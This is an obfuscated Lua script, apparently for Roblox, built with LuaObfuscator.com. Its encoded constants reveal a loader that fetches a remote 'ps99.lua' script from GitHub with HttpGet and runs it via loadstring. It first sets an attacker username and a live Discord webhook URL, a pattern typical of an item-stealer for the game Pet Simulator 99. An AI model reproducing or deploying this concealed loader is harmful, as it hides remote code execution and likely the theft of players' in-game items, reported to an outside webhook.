--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v91=v5(v81,v19);v19=nil;return v91;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -(1 + 0))) -(v32-(620 -(555 + (91 -27))))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=927 -(214 + 713) ;local v84;while true do if (v83==0) then v84=(1 + 1)^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v84 + v84))>=v84) and 1) or (1270 -(226 + 1044)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + (9 -4))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (959 -(892 + 65)) ;v35=2 -1 ;end end end local function v23() local v38=(255 + 95) -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * (189 + 67)) + v39 ;end if (v38==(0 -(0 -0))) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -(1003 -(915 + 82))) ;v38=1;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1,12 + 8 ) * (2^(470 -(145 + 293)))) + v43 ;local v47=v20(v44,(457 -(44 + 386)) -(1492 -(998 + 488)) ,31);local v48=((v20(v44,1219 -(1069 + 118) )==(2 -1)) and  -(1 -0)) or 1 ;if (v47==(0 + 0)) then if (v46==((0 + 0) -0)) then return v48 * (0 + 0) ;else v47=792 -(302 + 66 + 423) ;v45=0 -(772 -(201 + 571)) ;end elseif (v47==(2065 -(10 + 8))) then return ((v46==((1138 -(116 + 1022)) -0)) and (v48 * (1/(442 -(416 + (108 -82)))))) or (v48 * NaN) ;end return v8(v48,v47-((1918 + 1348) -2243) ) * (v45 + (v46/((1 + 1)^(91 -39)))) ;end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(10 -7)) then return v6(v52);end if (v50==2) then v52={};for v92=(2914 -2054) -(814 + 45) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=7 -4 ;end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=2;end if (v50==0) then v51=nil;if  not v49 then local v102=885 -(261 + 624) ;while true do if (v102==(0 -0)) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=(6742 -5318) -(630 + 313 + 480) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1581 -(1535 + 46) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53== #"{") then local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88~=0) then else v89=(function() return 0 + 0 ;end)();while true do if (v89==(0 + 0)) then v58=(function() return v23();end)();v59=(function() return {};end)();v89=(function() return 561 -(306 + 254) ;end)();end if (v89~=2) then else v53=(function() return 2;end)();break;end if (1~=v89) then else for v113= #"]",v58 do local v114=(function() return 0 + 0 ;end)();local v115=(function() return;end)();local v116=(function() return;end)();local v117=(function() return;end)();while true do if (v114~=0) then else local v166=(function() return 0;end)();while true do if (v166==(1 -0)) then v114=(function() return 1;end)();break;end if (v166==(1467 -(899 + 568))) then v115=(function() return 0;end)();v116=(function() return nil;end)();v166=(function() return 1 + 0 ;end)();end end end if ((2 -1)~=v114) then else v117=(function() return nil;end)();while true do if (v115==1) then if (v116== #",") then v117=(function() return v21()~=(603 -(268 + 335)) ;end)();elseif (v116==(292 -(60 + 230))) then v117=(function() return v24();end)();elseif (v116~= #"xnx") then else v117=(function() return v25();end)();end v59[v113]=(function() return v117;end)();break;end if (v115~=(572 -(426 + 146))) then else local v178=(function() return 0 + 0 ;end)();while true do if (v178==(1456 -(282 + 1174))) then v116=(function() return v21();end)();v117=(function() return nil;end)();v178=(function() return 1;end)();end if (v178~=(812 -(569 + 242))) then else v115=(function() return 2 -1 ;end)();break;end end end end break;end end end v57[ #"nil"]=(function() return v21();end)();v89=(function() return 2;end)();end end break;end end end if (v53==(1 + 1)) then for v94= #"}",v23() do local v95=(function() return v21();end)();if (v20(v95, #",", #"!")==(1024 -(706 + 318))) then local v103=(function() return 1251 -(721 + 530) ;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v103==(1273 -(945 + 326))) then while true do if (v104~= #"|") then else local v144=(function() return 0;end)();local v145=(function() return;end)();while true do if (v144==(0 -0)) then v145=(function() return 0;end)();while true do if (v145==(0 + 0)) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(700 -(271 + 429))) then local v179=(function() return 0 + 0 ;end)();local v180=(function() return;end)();while true do if (v179==(1500 -(1408 + 92))) then v180=(function() return 1086 -(461 + 625) ;end)();while true do if (v180==(1288 -(993 + 295))) then v107[ #"-19"]=(function() return v22();end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v105== #"\\") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==2) then v107[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v105== #"xnx") then local v187=(function() return 1171 -(418 + 753) ;end)();local v188=(function() return;end)();while true do if (v187==(0 + 0)) then v188=(function() return 0 + 0 ;end)();while true do if (v188==0) then v107[ #"xxx"]=(function() return v23() -(2^16) ;end)();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v145=(function() return 1;end)();end if (v145~=1) then else v104=(function() return 1 + 1 ;end)();break;end end break;end end end if (v104== #"-19") then if (v20(v106, #"nil", #"91(")== #"<") then v107[ #"0313"]=(function() return v59[v107[ #"?id="]];end)();end v54[v94]=(function() return v107;end)();break;end if (v104~=2) then else local v147=(function() return 0 + 0 ;end)();local v148=(function() return;end)();while true do if (v147~=0) then else v148=(function() return 0;end)();while true do if (v148==1) then v104=(function() return  #"19(";end)();break;end if (v148==0) then if (v20(v106, #"!", #":")== #"<") then v107[531 -(406 + 123) ]=(function() return v59[v107[2]];end)();end if (v20(v106,2,2)== #":") then v107[ #"19("]=(function() return v59[v107[ #"91("]];end)();end v148=(function() return 1;end)();end end break;end end end if (v104~=(1769 -(1749 + 20))) then else local v149=(function() return 0;end)();local v150=(function() return;end)();while true do if (v149==0) then v150=(function() return 0;end)();while true do if (0==v150) then v105=(function() return v20(v95,2, #"19(");end)();v106=(function() return v20(v95, #"?id=",2 + 4 );end)();v150=(function() return 1323 -(1249 + 73) ;end)();end if (v150==(1 + 0)) then v104=(function() return  #":";end)();break;end end break;end end end end break;end if (v103==(1145 -(466 + 679))) then local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();while true do if (v109~=0) then else v110=(function() return 0;end)();while true do if ((2 -1)==v110) then v103=(function() return 1;end)();break;end if (v110==(1900 -(106 + 1794))) then v104=(function() return 0 + 0 ;end)();v105=(function() return nil;end)();v110=(function() return 1;end)();end end break;end end end if (v103==(1 + 0)) then local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();while true do if (v111==0) then v112=(function() return 0 -0 ;end)();while true do if (v112==(114 -(4 + 110))) then v106=(function() return nil;end)();v107=(function() return nil;end)();v112=(function() return 585 -(57 + 527) ;end)();end if (v112~=1) then else v103=(function() return 1429 -(41 + 1386) ;end)();break;end end break;end end end end end end for v96= #"}",v23() do v55[v96-#">" ]=(function() return v28();end)();end return v57;end if (v53~=(103 -(17 + 86))) then else local v90=(function() return 0 + 0 ;end)();while true do if (v90==1) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 5 -3 ;end)();end if (v90~=2) then else v53=(function() return  #"[";end)();break;end if (v90==0) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1;end)();end end end end end local function v29(v60,v61,v62) local v63=v60[167 -(122 + 44) ];local v64=v60[2 -0 ];local v65=v60[9 -6 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1 + 0 + 0 ;local v71= -(1 + 0);local v72={};local v73={...};local v74=v12("#",...) -(66 -(30 + 35)) ;local v75={};local v76={};for v85=0 + 0 ,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + (1258 -(1043 + 214)) ];else v76[v85]=v73[v85 + (3 -2) ];end end local v77=(v74-v68) + (1213 -(323 + 889)) ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=(23 -14)) then if (v79<=(584 -(361 + 219))) then if ((4029<=4853) and (v79<=1)) then if (v79>(320 -(53 + 267))) then local v118=0 + 0 ;local v119;while true do if ((v118==0) or (516>3434)) then v119=v78[415 -((1519 -(363 + 1141)) + 398) ];v76[v119]=v76[v119](v13(v76,v119 + (983 -(18 + (2544 -(1183 + 397)))) ,v71));break;end end else local v120=0 -(0 -0) ;local v121;local v122;local v123;local v124;while true do if (v120==(1 + 0)) then v71=(v123 + v121) -(1 + 0) ;v124=850 -(20 + 830) ;v120=2 + 0 ;end if (v120==2) then for v171=v121,v71 do v124=v124 + (127 -(116 + 10)) ;v76[v171]=v122[v124];end break;end if (v120==0) then v121=v78[1 + 1 ];v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[741 -(542 + 196) ])));v120=1 -0 ;end end end elseif ((4046>=3033) and (v79<=2)) then v70=v78[3 + 0 ];elseif (v79>(1 + 2)) then if (v76[v78[2]]==v78[3 + 1 + 0 ]) then v70=v70 + 1 + (1975 -(1913 + 62)) ;else v70=v78[(5 + 2) -(10 -6) ];end else v62[v78[3]]=v76[v78[4 -2 ]];end elseif ((v79<=(1557 -(1126 + 425))) or (2719<=1447)) then if ((v79==(410 -((2051 -(565 + 1368)) + 287))) or (4134<3926)) then v76[v78[7 -5 ]]=v78[1124 -(118 + 1003) ];else local v128=v78[2];local v129=v76[v78[3]];v76[v128 + (2 -1) ]=v129;v76[v128]=v129[v78[4]];end elseif ((v79<=7) or (164>=2785)) then v76[v78[2]]();elseif ((v79>(30 -22)) or (525==2109)) then v70=v78[380 -(142 + 235) ];else v76[v78[9 -7 ]]=v78[1 + 2 ];end elseif ((33==33) and (v79<=(991 -(553 + 424)))) then if (v79<=((1681 -(1477 + 184)) -9)) then if (v79>(9 + 1)) then do return;end else v76[v78[2 + 0 ]]=v62[v78[3]];end elseif ((3054<=4015) and (v79<=(7 + (6 -1)))) then if (v76[v78[1 + 1 ]]==v78[3 + 1 ]) then v70=v70 + ((2 + 0) -(857 -(564 + 292))) ;else v70=v78[7 -4 ];end elseif (v79==(29 -(26 -10))) then v76[v78[1 + (2 -1) ]]();else local v157=v78[2];local v158=v76[v78[14 -11 ]];v76[v157 + (754 -(239 + 514)) ]=v158;v76[v157]=v158[v78[(306 -(244 + 60)) + 2 ]];end elseif ((1871<3382) and (v79<=16)) then if (v79>(1344 -(797 + 532))) then local v135=v78[2 + 0 ];local v136,v137=v69(v76[v135](v13(v76,v135 + 1 + 0 + (476 -(41 + 435)) ,v78[6 -(1004 -(938 + 63)) ])));v71=(v137 + v135) -1 ;local v138=1202 -(373 + 829) ;for v141=v135,v71 do v138=v138 + (732 -(476 + 255)) ;v76[v141]=v136[v138];end else v76[v78[1132 -(369 + 761) ]]=v62[v78[2 + 1 ]];end elseif (v79<=(30 -13)) then do return;end elseif (v79==(33 -15)) then v62[v78[241 -(64 + 174) ]]=v76[v78[1 + 1 ]];else local v164=0 -0 ;local v165;while true do if (v164==(336 -(144 + 192))) then v165=v78[218 -(33 + 9 + 174) ];v76[v165]=v76[v165](v13(v76,v165 + 1 + 0 ,v71));break;end end end v70=v70 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C756103083O00557365726E616D6503103O006261746D616E666F726576657233303903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323733312O36372O393834332O38353137392F4E4B396D49526279726C364D344869315F495075496E524E5441467A676A74704D416474546E4D3233356A6C52546B4C65727541542D6943704A38485F7832363835534A00143O0012053O00013O0026043O000B000100020004023O000B000100120F000100033O00120F000200043O00200E000200020005001205000400066O000200044O001300013O00022O00070001000100010004023O001300010026043O0001000100010004023O00010001001205000100083O002O12000100073O0012050001000A3O002O12000100093O0012053O00023O0004023O000100012O00113O00017O00",v9(),...);
